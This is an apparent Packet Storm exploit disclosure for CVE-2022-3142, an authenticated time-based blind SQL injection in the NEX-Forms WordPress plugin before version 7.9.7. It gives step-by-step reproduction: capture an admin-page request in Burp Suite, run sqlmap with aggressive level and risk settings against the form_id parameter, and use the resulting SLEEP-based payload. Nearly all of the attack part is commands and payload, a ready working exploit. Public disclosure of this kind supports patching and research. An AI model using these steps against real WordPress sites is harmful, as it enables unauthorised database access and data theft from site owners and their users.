Lucene search

K
packetstormElias HohlPACKETSTORM:171477
HistoryMar 27, 2023 - 12:00 a.m.

WordPress NEX-Forms SQL Injection

2023-03-2700:00:00
Elias Hohl
packetstormsecurity.com
165
wordpress
nex-forms
sql injection
authenticated
vulnerability
burp suite
docker-compose
mysql
cve-2022-3142
ubuntu 20.04
elias hohl

EPSS

0.003

Percentile

71.5%

`# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi  
# Exploit Author: Elias Hohl  
# Date: 2022-08-01  
# Vendor Homepage: https://basixonline.net  
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/  
# Tested on: Ubuntu 20.04  
# CVE : CVE-2022-3142  
  
Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin  
  
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5  
  
1. Start a new Wordpress instance using docker-compose.  
  
2. Install the NEX Forms plugin.  
  
3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.  
  
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3  
sqlmap will find a time-based blind payload:  
  
  
Parameter: form_id (GET)  
Type: time-based blind  
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)  
  
  
`

EPSS

0.003

Percentile

71.5%